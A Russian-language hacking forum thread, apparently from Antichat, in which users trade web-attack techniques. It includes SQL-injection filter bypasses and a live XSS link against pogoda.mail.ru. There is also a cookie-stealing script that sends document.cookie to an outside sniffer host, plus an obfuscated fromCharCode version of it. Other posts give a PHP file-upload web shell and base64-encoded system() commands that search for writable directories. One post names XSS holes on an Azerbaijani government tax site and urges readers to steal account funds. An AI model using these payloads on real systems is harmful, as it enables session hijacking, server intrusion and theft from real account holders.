И ты уверен, что все и всегда юзают пробел? Что будет с твоим фильтром, если вместо пробела окажется табуляция или переход на новую строку? Запрос так же можно обрезать с помошью #. И не забывай о фрагментированных иньекциях (кавычку отфильтровали, но слеш - нет, благодаря чему, в зависимости от запроса, один хер можно провести иньекцию). Ах да, можно обойтись и без табов с каретками, юзая скобки.
Опять вопросик у меня. Нашёл xss: http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E Захожу на ссылку срабатывает alert и показывает рамку xss. Пошёл на сниффер http://hacker-pro.net/sniffer/ и сделал редикет, но не сработало, даже взов не бросает снифферу, так-как лог пустой. Ну решил поменять сниффер и пошёл на сниффер www.sniffer.xaknet.ru и сделал следующее: вставил ссылку из сниффер вместо alert: http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;</script> и так испробовал несколько ссылок, но лог ПУСТОЙ! Что делать? А можете сами быстринко поставить нужную ссылку и джать мне адрес сниффера, а потом я буду эксприментировать и найду разницу и свою ошибку. Поможете?
IND1G0, этот твой фильтр все, кто знаком со скулями не первый день, обойдут. Методов вагон и маленькая тележка. Да и к чему пустая трата времени при написании недо-фильтров, если есть нормальные методы: https://forum.antichat.ru/thread30641.html
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>eval(String.fromCharCode(105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,115,110,105,102,102,101,114,46,120,97,107,110,101,116,46,114,117,47,115,109,105,108,101,115,47,105,109,103,95,95,49,51,57,50,46,103,105,102,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59))</script><!--+ не забудь пробелы вырезать
BlackSun, и без чара обойтись можно . Cehennem, я тебе уже говорил, "+" воспринимается как пробел. Для XSS используй %2B.
Загружать с компа если у тебя его нет, значит ты не админ (но это совсем не говорит о том, что если он у тебя есть, то ты админ ), а если ты не админ, значит пи*дуешь дальше, так как ничего не светит (по крайней мере авторизоваться )...
Ну там же понятно что это админ панель И для более безопасной работы сайта ввели "Authorization key", только проверенные люди админа могут это ввести
Cehennem Кавычки слэшируются, из-за этого не пашет, надо закодировать ссылку. Для кодирования используй, к примеру: http://ha.ckers.org/xss.html, а лучше http://kaimi.ru/2009/06/универсальный-конвертр-текста-1-0/. Там закодируй в String.fromCharCode. А BlackSun закодировал твою ссылку, куки идут к тебе на снифер.
Значит кавычки шлифуются, всё понятно. Сделаю ссылку типа www.site.com/sссылка для сниффер/ и проверю. Всем спасибо ребята. И ещё хотел бы поделится с вами, я нашёл на одном сайте xss, а сайт не простой сайт, сайт государственный, на этом сайте у жителей всего Азербайджана, тоесть у миллионов азербайджанцев есть шот, они хранять свои денги. Есть некоторые у которых есть милйарды долларов на счёте. Пользовател может за минуту перевести все свои денги из счёта в другой счёт. Через xss думаю можно ломануть. Вот сайт: http://www.e-taxes.gov.az/ xss: http://www.taxes.gov.az/?name=birpencere (в поле пишем html команду). xss: https://www.e-taxes.gov.az/ebyn/TaxPayerChecker.jsp (в поле пишем html команду). xss: https://www.e-taxes.gov.az/ebyn/edvPayerChecker.jsp (в поле пишем html команду). Всего нашёл 3-е xss. И ещё скажу что сайт не сайт, а всё дырка! Так-что ломайте перевадите денги на свой счёт и кайфуйте пока за вами не пришёл Азербайджанский ФБР.
GET запросы могут фильтроваться. В смысле просто слово GET Попробуй действовать через пост, например так: <form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go></form><?if(isset($_POST[go])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}}?> PS: неоднократно натыкался на фильтрацию GET или просто запрет записи в файл именно "GET" В общем рыть в сторону POST вариантов, имхо ЗЫЖ Плюс eval($_GET['lol']); можно смело заменить на eval($_GET[lol]); в прямом и переносном смысле - может быть будет другой результат, не мне тебе объяснять, что каждая ситуация всегда практически уникальна Эксперементировать с ? и & после сам знаешь чего - как не тупо бы выглядело бы - результат иногда разный
Ну а что там должно быть-то? Не обязательно. Как раз белая страница может быть запросто Покажешь пример?
Зачем? Вы же ГУРУ хакинга, наверное, даже скорее всего я несу бред. Но сегодня простительно Всех с праздником!
скорее всего только с правами на запись в папку, выполни такой код, чтобы найти сам знаешь что: Поиск папки, доступной на запись: 0)<? // это system('cd ../; find . -perm -2 -type d -ls'); eval(base64_decode(c3lzdGVtKCdjZCAuLi87IGZpbmQgLiAtcGVybSAtMiAtdHlwZSBkIC1scycpOw)); ?> 1) $dirs=scandir($_SERVER['DOCUMENT_ROOT']);foreach($dirs as $whot) {if(is_dir($whot) && is_writable($whot)){echo "writeable dir: $whot";}} 2) echo '<pre>';$path = '/абсолютный_путь/http';function fold($rootDir, $allData=array()){$invisibleFileNames = array(".", "..");$dirContent = scandir($rootDir);foreach($dirContent as $key => $content){$path = $rootDir.'/'.$content;if(!in_array($content,$invisibleFileNames)){if(is_file($path) && is_writable($path)){$allData[] = $path; }elseif(is_dir($path) && is_writable($path)){$allData = fold($path, $allData);}}}return $allData;}$a = fold($path);print_r($a);echo '</pre>';